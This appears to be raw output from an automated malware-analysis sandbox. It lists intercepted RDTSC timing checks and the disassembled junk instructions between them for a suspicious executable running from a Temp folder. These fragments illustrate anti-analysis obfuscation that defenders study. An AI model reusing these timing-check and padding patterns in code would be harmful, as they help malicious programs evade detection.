Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	RDTSC instruction interceptor: First address: AE9099 second address: AE90D7 instructions: 0x00000000 rdtsc 0x00000002 je 00007F1144C8B188h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov eax, dword ptr [esp+04h] 0x00000010 jmp 00007F1144C8B194h 0x00000015 mov eax, dword ptr [eax] 0x00000017 push eax 0x00000018 push edx 0x00000019 jmp 00007F1144C8B196h 0x0000001e rdtsc
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	RDTSC instruction interceptor: First address: AE90D7 second address: AE90F3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F114478E73Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp+04h], eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jc 00007F114478E738h 0x00000015 pushad 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	RDTSC instruction interceptor: First address: AE90F3 second address: AE90F9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	RDTSC instruction interceptor: First address: AE912B second address: AE912F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	RDTSC instruction interceptor: First address: AE912F second address: AE91BC instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 mov dword ptr [esp], eax 0x0000000a mov dword ptr [ebp+122D27DCh], edi 0x00000010 push 00000000h 0x00000012 mov cl, 79h 0x00000014 push 0D44CC43h 0x00000019 jnl 00007F1144C8B19Ah 0x0000001f xor dword ptr [esp], 0D44CCC3h 0x00000026 push 00000000h 0x00000028 push edi 0x00000029 call 00007F1144C8B188h 0x0000002e pop edi 0x0000002f mov dword ptr [esp+04h], edi 0x00000033 add dword ptr [esp+04h], 00000019h 0x0000003b inc edi 0x0000003c push edi 0x0000003d ret 0x0000003e pop edi 0x0000003f ret 0x00000040 push 00000003h 0x00000042 cld 0x00000043 push 00000000h 0x00000045 push 00000000h 0x00000047 push ebp 0x00000048 call 00007F1144C8B188h 0x0000004d pop ebp 0x0000004e mov dword ptr [esp+04h], ebp 0x00000052 add dword ptr [esp+04h], 00000014h 0x0000005a inc ebp 0x0000005b push ebp 0x0000005c ret 0x0000005d pop ebp 0x0000005e ret 0x0000005f push 00000003h 0x00000061 call 00007F1144C8B189h 0x00000066 push eax 0x00000067 push edx 0x00000068 push edx 0x00000069 push eax 0x0000006a pop eax 0x0000006b pop edx 0x0000006c rdtsc
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	RDTSC instruction interceptor: First address: AE91BC second address: AE91C6 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F114478E73Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	RDTSC instruction interceptor: First address: AE91C6 second address: AE91D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push ebx 0x0000000a jbe 00007F1144C8B186h 0x00000010 pop ebx 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	RDTSC instruction interceptor: First address: AE91D7 second address: AE91F2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F114478E746h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	RDTSC instruction interceptor: First address: AE91F2 second address: AE9201 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov eax, dword ptr [esp+04h] 0x0000000b pushad 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	RDTSC instruction interceptor: First address: AE9201 second address: AE9210 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jo 00007F114478E736h 0x0000000f rdtsc
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	RDTSC instruction interceptor: First address: AE9376 second address: AE937A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	RDTSC instruction interceptor: First address: AE937A second address: AE9384 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F114478E736h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	RDTSC instruction interceptor: First address: AE948F second address: AE94AF instructions: 0x00000000 rdtsc 0x00000002 jng 00007F1144C8B186h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop eax 0x0000000b push eax 0x0000000c push esi 0x0000000d je 00007F1144C8B188h 0x00000013 push esi 0x00000014 pop esi 0x00000015 pop esi 0x00000016 mov eax, dword ptr [esp+04h] 0x0000001a push eax 0x0000001b push edx 0x0000001c push edx 0x0000001d pushad 0x0000001e popad 0x0000001f pop edx 0x00000020 rdtsc
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	RDTSC instruction interceptor: First address: B07BB9 second address: B07BC9 instructions: 0x00000000 rdtsc 0x00000002 je 00007F114478E736h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e push ecx 0x0000000f pop ecx 0x00000010 rdtsc
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	RDTSC instruction interceptor: First address: B07BC9 second address: B07BD5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	RDTSC instruction interceptor: First address: B07BD5 second address: B07BD9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	RDTSC instruction interceptor: First address: B07D63 second address: B07D69 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	RDTSC instruction interceptor: First address: B07EF6 second address: B07F0F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F114478E741h 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	RDTSC instruction interceptor: First address: B08041 second address: B0804C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	RDTSC instruction interceptor: First address: B0804C second address: B08050 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	RDTSC instruction interceptor: First address: B0830A second address: B0832B instructions: 0x00000000 rdtsc 0x00000002 jo 00007F1144C8B188h 0x00000008 push eax 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d jbe 00007F1144C8B18Ch 0x00000013 jnc 00007F1144C8B186h 0x00000019 push eax 0x0000001a push edx 0x0000001b jp 00007F1144C8B186h 0x00000021 rdtsc
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	RDTSC instruction interceptor: First address: B0832B second address: B0832F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	RDTSC instruction interceptor: First address: B0832F second address: B08335 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	RDTSC instruction interceptor: First address: B085FA second address: B0864F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push esi 0x00000006 jmp 00007F114478E746h 0x0000000b pop esi 0x0000000c pushad 0x0000000d jmp 00007F114478E741h 0x00000012 je 00007F114478E736h 0x00000018 push edi 0x00000019 pop edi 0x0000001a popad 0x0000001b push eax 0x0000001c push edx 0x0000001d pushad 0x0000001e popad 0x0000001f jmp 00007F114478E749h 0x00000024 rdtsc
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	RDTSC instruction interceptor: First address: B08C23 second address: B08C4A instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 pushad 0x00000008 jmp 00007F1144C8B196h 0x0000000d pushad 0x0000000e push esi 0x0000000f pop esi 0x00000010 pushad 0x00000011 popad 0x00000012 push edx 0x00000013 pop edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	RDTSC instruction interceptor: First address: B08D9B second address: B08D9F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	RDTSC instruction interceptor: First address: B08D9F second address: B08DA3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	RDTSC instruction interceptor: First address: B08DA3 second address: B08DAB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	RDTSC instruction interceptor: First address: B08DAB second address: B08DE2 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jmp 00007F1144C8B18Fh 0x00000008 jno 00007F1144C8B186h 0x0000000e pop esi 0x0000000f pop edx 0x00000010 pop eax 0x00000011 pushad 0x00000012 jmp 00007F1144C8B191h 0x00000017 jne 00007F1144C8B18Eh 0x0000001d push esi 0x0000001e pop esi 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	RDTSC instruction interceptor: First address: B08DE2 second address: B08E02 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F114478E743h 0x00000009 push edx 0x0000000a je 00007F114478E736h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	RDTSC instruction interceptor: First address: B08F93 second address: B08F97 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	RDTSC instruction interceptor: First address: B09561 second address: B09584 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 jbe 00007F114478E736h 0x0000000d jmp 00007F114478E746h 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	RDTSC instruction interceptor: First address: B09584 second address: B0959E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jnl 00007F1144C8B18Ch 0x0000000e popad 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	RDTSC instruction interceptor: First address: B0959E second address: B095A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F114478E736h 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	RDTSC instruction interceptor: First address: B095A8 second address: B095AC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	RDTSC instruction interceptor: First address: B095AC second address: B095B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	RDTSC instruction interceptor: First address: B095B2 second address: B095BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	RDTSC instruction interceptor: First address: B095BB second address: B095C1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	RDTSC instruction interceptor: First address: B09746 second address: B0974B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	RDTSC instruction interceptor: First address: B09A20 second address: B09A26 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	RDTSC instruction interceptor: First address: B0D109 second address: B0D10E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	RDTSC instruction interceptor: First address: B0D10E second address: B0D118 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F114478E73Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	RDTSC instruction interceptor: First address: B0C285 second address: B0C2A8 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F1144C8B19Ah 0x00000008 jmp 00007F1144C8B194h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 pushad 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	RDTSC instruction interceptor: First address: B0C2A8 second address: B0C2AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	RDTSC instruction interceptor: First address: B0C2AE second address: B0C2B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	RDTSC instruction interceptor: First address: B0C2B6 second address: B0C2BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	RDTSC instruction interceptor: First address: B11A2E second address: B11A3F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1144C8B18Ah 0x00000007 push ecx 0x00000008 push edx 0x00000009 pop edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	RDTSC instruction interceptor: First address: AD9B3B second address: AD9B44 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push edi 0x00000008 pop edi 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	RDTSC instruction interceptor: First address: AD9B44 second address: AD9B48 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	RDTSC instruction interceptor: First address: AD9B48 second address: AD9B4E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	RDTSC instruction interceptor: First address: AD9B4E second address: AD9B59 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 je 00007F1144C8B186h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	RDTSC instruction interceptor: First address: AD9B59 second address: AD9B72 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 push edi 0x00000008 pushad 0x00000009 popad 0x0000000a pushad 0x0000000b popad 0x0000000c pop edi 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 pushad 0x00000011 je 00007F114478E736h 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	RDTSC instruction interceptor: First address: B14F2D second address: B14F42 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F1144C8B18Fh 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	RDTSC instruction interceptor: First address: B150BD second address: B150C9 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F114478E736h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	RDTSC instruction interceptor: First address: B150C9 second address: B150EB instructions: 0x00000000 rdtsc 0x00000002 ja 00007F1144C8B188h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F1144C8B190h 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	RDTSC instruction interceptor: First address: B150EB second address: B150FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F114478E73Ch 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	RDTSC instruction interceptor: First address: B150FB second address: B15101 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	RDTSC instruction interceptor: First address: B15420 second address: B15430 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push edi 0x00000008 jnc 00007F114478E736h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	RDTSC instruction interceptor: First address: B15964 second address: B1596E instructions: 0x00000000 rdtsc 0x00000002 je 00007F1144C8B186h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	RDTSC instruction interceptor: First address: B1596E second address: B1597C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jno 00007F114478E736h 0x0000000e rdtsc
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	RDTSC instruction interceptor: First address: B1870C second address: B18725 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F1144C8B195h 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	RDTSC instruction interceptor: First address: B18725 second address: B18729 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	RDTSC instruction interceptor: First address: B18729 second address: B18785 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [esp+04h] 0x0000000c jmp 00007F1144C8B197h 0x00000011 mov eax, dword ptr [eax] 0x00000013 push ecx 0x00000014 push ecx 0x00000015 push edi 0x00000016 pop edi 0x00000017 pop ecx 0x00000018 pop ecx 0x00000019 mov dword ptr [esp+04h], eax 0x0000001d pushad 0x0000001e push edx 0x0000001f push esi 0x00000020 pop esi 0x00000021 pop edx 0x00000022 push ecx 0x00000023 pushad 0x00000024 popad 0x00000025 pop ecx 0x00000026 popad 0x00000027 pop eax 0x00000028 jmp 00007F1144C8B197h 0x0000002d push 325F305Ah 0x00000032 push eax 0x00000033 push edx 0x00000034 push eax 0x00000035 push edx 0x00000036 push edx 0x00000037 pop edx 0x00000038 rdtsc
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	RDTSC instruction interceptor: First address: B18785 second address: B1878B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	RDTSC instruction interceptor: First address: B1878B second address: B18790 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	RDTSC instruction interceptor: First address: B18A53 second address: B18A58 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	RDTSC instruction interceptor: First address: B18A58 second address: B18A67 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F1144C8B18Bh 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	RDTSC instruction interceptor: First address: B18A67 second address: B18A6B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	RDTSC instruction interceptor: First address: B18C87 second address: B18C8B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	RDTSC instruction interceptor: First address: B18E00 second address: B18E0A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jne 00007F114478E736h 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	RDTSC instruction interceptor: First address: B1935D second address: B19362 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	RDTSC instruction interceptor: First address: B193BE second address: B193C2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	RDTSC instruction interceptor: First address: B193C2 second address: B19412 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 mov dword ptr [esp], ebx 0x0000000a push 00000000h 0x0000000c push esi 0x0000000d call 00007F1144C8B188h 0x00000012 pop esi 0x00000013 mov dword ptr [esp+04h], esi 0x00000017 add dword ptr [esp+04h], 0000001Ch 0x0000001f inc esi 0x00000020 push esi 0x00000021 ret 0x00000022 pop esi 0x00000023 ret 0x00000024 jnl 00007F1144C8B18Fh 0x0000002a nop 0x0000002b pushad 0x0000002c push eax 0x0000002d push edx 0x0000002e jmp 00007F1144C8B18Fh 0x00000033 rdtsc
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	RDTSC instruction interceptor: First address: B194B7 second address: B194BB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	RDTSC instruction interceptor: First address: B196C7 second address: B196CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	RDTSC instruction interceptor: First address: B196CB second address: B196CF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
